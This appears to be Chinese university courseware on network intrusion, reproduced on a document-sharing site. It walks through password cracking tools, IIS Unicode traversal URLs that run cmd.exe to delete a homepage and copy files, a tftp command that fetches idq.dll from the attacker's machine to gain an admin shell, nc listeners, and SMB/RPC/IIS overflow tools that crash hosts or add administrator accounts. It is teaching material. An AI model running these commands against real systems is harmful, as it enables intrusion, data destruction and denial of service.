信息安全技术PPT课件推荐

上传人:ni****g 文档编号:568811151 上传时间:2024-07-27 格式:PPT 页数:68 大小:1.06MB
返回 下载 相关 举报
信息安全技术PPT课件推荐_第1页
第1页 / 共68页
信息安全技术PPT课件推荐_第2页
第2页 / 共68页
信息安全技术PPT课件推荐_第3页
第3页 / 共68页
信息安全技术PPT课件推荐_第4页
第4页 / 共68页
信息安全技术PPT课件推荐_第5页
第5页 / 共68页
点击查看更多>>
资源描述

《信息安全技术PPT课件推荐》由会员分享,可在线阅读,更多相关《信息安全技术PPT课件推荐(68页珍藏版)》请在金锄头文库上搜索。

1、第五章 网络入侵 1内容提要n本章是攻击技术中最重要的一章,介绍目前常用的网络攻击手段:n社会工程学攻击n物理攻击n暴力攻击n利用Unicode漏洞攻击n利用缓冲区溢出漏洞进行攻击等技术。n并结合实际,介绍流行的攻击工具的使用以及部分工具的代码实现。 2社会工程学攻击 n社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。n举个例子:一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他

2、们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。3社会工程学攻击n目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造Emailn1、打电话请求密码 n尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。n2、伪造Emailn使用telnet一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息显

3、得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。4物理攻击与防范 n物理安全是保护一些比较重要的设备不被接触。n物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。 5案例5-1得到管理员密码 n用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,如图5-1所示。6案例5-1得到管理员密码n使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录,执行该程序,将得到

4、当前用户得登录名,如图5-2所示。7权限提升n有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。n其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。8案例5-2 普通用户建立管理员帐号n利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如图5-5所示。9普通用户建立管理员帐号n输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如图

5、5-6所示。10暴力攻击n暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码。n一个黑客需要破解段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。11字典文件 n一次字典攻击能否成功,很大因素上决定与字典文件。一个好的字典文一次字典攻击能否成功,很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算件可以高效快速的得到系统

6、的密码。攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。可以大大的提高破解效率。n一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件,图可能的密码。目前有很多工具软件专门来创建字典文件,图5-8是一个简是一个简单的字典文件。

7、单的字典文件。12暴力破解操作系统密码 n字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示n案例5-3 暴力破解操作系统密码 n比如使用图5-8所示的字典文件,利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来,如图5-9所示。13暴力破解邮箱密码 n邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。n尤其七位全部是数字,更容易被破解。n案例5-4 电子邮箱暴力破解 n破解电子邮箱密码,一个比较著名的工具软件是:黑雨POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界

8、面如图5-10所示。14暴力破解软件密码 n目前许多软件都具有加密的功能,比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话,同样容易被破解。n案例5-5 Office文档暴力破解 15修改权限密码n在对话框中选择选项卡“安全性”,在打开权限密码和修改权限密码的两个文本框中都输入“999”,如图5-12所示。16输入密码n保存并关闭该文档,然后再打开,就需要输入密码了,如图5-13所示。17破解Word文档密码n该密码是三位的,使用工具软件,Advanced Office XP Password Recove

9、ry可以快速破解Word文档密码,主界面如图5-14所示。18破解Word文档密码n点击工具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息,如图5-15所示。19破解Word文档密码n设置密码长度最短是一位,最长是三位,点击工具栏开始的图标,开始破解密码,大约两秒钟后,密码被破解了,如图5-16所示。20Unicode漏洞专题 n通过打操作系统的补丁程序,就可以消除漏洞。只要通过打操作系统的补丁程序,就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。

10、了相关的补丁。nUnicode漏洞是漏洞是2000-10-17发布的,受影响的版本:发布的,受影响的版本:nMicrosoft IIS 5.0+Microsoft Windows 2000系列版本系列版本nMicrosoft IIS 4.0+ Microsoft Windows NT 4.0n消除该漏洞的方式是安装操作系统的补丁,只要安装消除该漏洞的方式是安装操作系统的补丁,只要安装了了SP1以后,该漏洞就不存在了。微软以后,该漏洞就不存在了。微软IIS 4.0和和5.0都存在利用扩展都存在利用扩展UNICODE字符取代字符取代/和和而能利而能利用用./目录遍历的漏洞。目录遍历的漏洞。21Un

11、icode漏洞的检测方法n使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如图5-17所示。22Unicode漏洞的检测方法n将主机添加到目标地址,扫描结果如图5-18所示。23Unicode漏洞的检测方法n可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:n/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dirn其中/scripts目录是

12、IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。24Unicode漏洞的检测方法nscripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。25Unicode漏洞的检测方法n在Windows的目录结构中,可以使用两个点和一个斜线“./”来访问上一级目录,在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。n浏览器地址栏中禁用

13、符号“./”,但是可以使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。26Unicode漏洞n此漏洞从中文此漏洞从中文IIS4.0+SP6开始,还影响中文开始,还影响中文WIN2000+IIS5.0、中文、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。在,台湾繁体中文也同样存在这样的漏洞。在NT4中中/编码为编码为“%c1%9c”或者或者“%c1%9c”,WIN2000英文版是英文版

14、是“%c0%af”。n但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。该编码存在于日文版、韩文版等操作系统。n%c1%pcn%c0%9vn%c0%qfn%c1%8sn%e0%80%afn利用该漏洞读取出计算机上目录列表,比如读取利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输盘的目录,只要在浏览器中输入入n“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:

15、”27利用Unicode漏洞读取系统盘目录 28利用Unicode漏洞读取系统盘目录n利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inin执行的结果如图5-22所示。29利用Unicode漏洞删除主页n利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.

16、asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。n使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp30利用Unicode漏洞删除主页31拷贝文件n为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsyste

17、m32cmd.exe+c.exen程序执行结果如图5-24所示。 32查看C盘的目录n以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:nhttp:/172.18.25.109/scripts/c.exe?/c+dir+c:n执行的结果如图5-25所示。33利用Unicode漏洞入侵系统 n在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。n需要上传一个名为“idq.dll”的文件,

18、为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(Text File Transmission Protocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图5-26所示。 34利用Unicode漏洞入侵系统35利用Unicode漏洞入侵系统n这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:n“http:/172.18.25.109/scripts/.%c0%2f.

19、/winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”,n命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,执行成功的界面如图5-27所示。 36上载文件 37查看scripts目录 n上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图5-28所示。38入侵对方主机 n说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。n拷贝ispc.exe文件到本地计算机的

20、C盘根目录,在DOS命令行下执行命令:n“ispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程5-29所示。 39建立用户 n可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图5-30所示。40其他漏洞攻击 n利用打印漏洞n利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试,该漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。 n使用工具软件:cniis.ex

21、e,使用的语法格式是:“cniis 172.18.25.109 0”,第一个参数是目标的IP地址,第二参数是目标操作系统的补丁号,因为172.18.25.109没有打补丁,这里就是0。拷贝cniis.exe文件到C盘根目录,执行程序如图5-31所示。41SMB致命攻击nSMB(Session Message Block,会话消息块协议)又叫做,会话消息块协议)又叫做NetBIOS或或LanManager协议,用于不同计算机之间文件、打协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于印机、串口和通讯的共享和用于Windows平台上提供磁盘和打平台上提供磁盘和打印机的共享。印机的共享。

22、nSMB协议版本有很多种,在协议版本有很多种,在Windows 98、Windows NT、Windows 2000和和XP使用的是使用的是NTLM 0.12版本。版本。n利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的自己计算机共享目录的SMB会话包,然后利用会话包,然后利用SMB会话包登录对会话包登录对方的计算机。下面介绍利用方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启协议让对方操作系统系统重新启动或者蓝屏。动或者蓝屏。42致命攻击 n使用的工具软件是:SMBDie V1.0,该软件对打了SP

23、3、SP4的计算机依然有效,必须打专门的SMB补丁,软件的主界面如图5-32所示。 43致命攻击n攻击的时候,需要两个参数:对方的IP地址和对方的机器名,窗口中分别输入这两项,如图5-33所示。44致命攻击 n然后再点按钮“Kill”,如果参数输入没有错误的话,对方计算机立刻重启或蓝屏,命中率几乎100%,被攻击的计算机蓝屏界面如图5-34所示。45缓冲区溢出攻击n目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果

24、使在系统上产生一个后门。n这项攻击对技术要求比较高,但是攻击的过程却非常简单。缓冲区溢出原理很简单,比如程序:46缓冲区溢出攻击nvoid function(char * szPara1)nnchar buff16;nstrcpy(buffer, szPara1);nn程序中利用strcpy函数将szPara1中的内容拷贝到buff中,只要szPara1的长度大于16,就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有:strcat()、gets()、scanf()等。47RPC漏洞溢出 n远程过程调用RPC(Remote Procedure Call),是操作系统的一种消息传递

25、功能,允许应用程序呼叫网络上的计算机。当系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务,如图5-35所示。48利用RPC漏洞建立超级用户 nRPC溢出漏洞,对SP4也适用,必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞,该工具是ISS安全公司2003年7月30日发布的,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。n如果没有安装补丁程序,该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录,现在要检查地址段172.18.25.109到172.18

26、.25.110的主机,执行命令“scanms.exe 172.18.25.109-172.18.25.110”,检查过程如图5-36所示。49检查缓冲区溢出漏洞50检查缓冲区溢出漏洞n利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。n新建用户的用户名和密码都是qing10,这样就可以登录对方计算机了,RPC服务停止操作系统将有许多功能不能使用,非常容易被管理员发现,使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全过程如图5-37所示。51攻击的全过程 52利用IIS溢出

27、进行攻击 n案例5-11 利用IIS溢出入侵系统n利用软件Snake IIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口,工具软件的主界面如图5-38所示。 53利用IIS溢出进行攻击n该软件适用于各种类型的操作系统,比如对172.18.25.109进行攻击,172.18.25.109的操作系统的Windows 2000,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dir c:”设置如图5-39所示。54n点击按钮“IDQ溢出”,出现攻击成功的提示框,如图5-40所示。55n这个时候,813端口已经开放,利用工具软件nc.exe连

28、接到该端口,将会自动执行改才发送的DOS命令“dir c:”,使用的语法是:nc.exe -vv 172.18.25.109 813,其中-vv是程序的参数,813是目标端口。可以看到命令的执行结果,如图5-41所示。56监听本地端口 n下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc -l -p 813”,执行的过程如图5-42所示。57n这个窗口就这样一直保留,启动工具软件snake,本地的IP地址是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出选项中的第一项,

29、设置IP为本地IP地址,端口是813,如图5-43所示。58n设置好以后,点击按钮“IDQ溢出”,程序显示对话框如图4-44所示。59n查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来,如图4-45所示。60利用WebDav远程溢出n需要使用工具软件nc.exe和webdavx3.exe,首先在DOS命令行下执行webdavx3.exe,如果执行的话,该程序将提示已经过期了,如图4-46所示。61攻击n修改本地系统时间到2001年,这样就可以攻击了,在命令后面直接跟对方的IP地址就可以了,现在要攻击的计算机是172.18.25.109,执行情况如图

30、4-47所示。62入侵对方的计算机n该程序不能自动退出,当发现程序长时间没有反映的时候,需要手工按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788,依然可以nc.exe程序入侵对方的计算机,过程如图4-48所示。63拒绝服务攻击 n拒绝服务攻击的简称是:DoS(Denial of Service)攻击,凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击,其目的是使目标计算机或网络无法提供正常的服务。n最常见的DoS攻击是:计算机网络带宽攻击和连通性攻击。带宽攻击是以极大的通信量冲击网络,使网络所有可用的带宽都被消耗掉,最后导致合法用户的请求无法通过。连通性攻击指用大量的

31、连接请求冲击计算机,最终导致计算机无法再处理合法用户的请求。64案例5-13 程序分析n案例5-13 程序分析n利用缓冲区或者漏洞的攻击的程序一般都比较小,但是都要涉及shell编程技术和Socket编程技术。n案例5-8使用cniis.exe工具进行攻击,该工具的源代码如程序proj5_13.cpp所示。65本章总结n本章主要介绍网络攻击的常用手段和技巧n介绍的工具都是有代表性的工具,但是还有许多其他的工具可以进行有效的攻击。n需要了解社会工程学攻击的基本方法、学会防范物理攻击。n重点掌握暴力攻击下的暴力破解操作系统密码、暴力破解邮箱密码和暴力破解Office文档的密码;n掌握各种漏洞攻击以

32、及防御手段,掌握各种缓冲区溢出攻击的手段以及防御的手段。n了解拒绝服务攻击的概念。66本章习题n【1】、简述社会工程学攻击的原理。n【2】、登录系统以后如何得到管理员密码?如何利用普通用户建立管理员帐户?n【3】、简述暴力攻击的原理。暴力攻击如何破解操作系统的用户密码、如何破解邮箱密码、如何破解Word文档的密码?针对暴力攻击,如何防御?n【4】、简述Unicode漏洞的基本原理。n【5】、简述缓冲区溢出攻击的原理。n【6】、简述拒绝服务的种类与原理。n【7】、利用Unicode漏洞入侵对方计算机,更改Administrator密码为123456。(上机完成)n【8】、利用三种不同的方法,入侵对方系统,并写入侵总结报告。(上机完成)67个人观点供参考,欢迎讨论!

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 资格认证/考试 > 自考

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号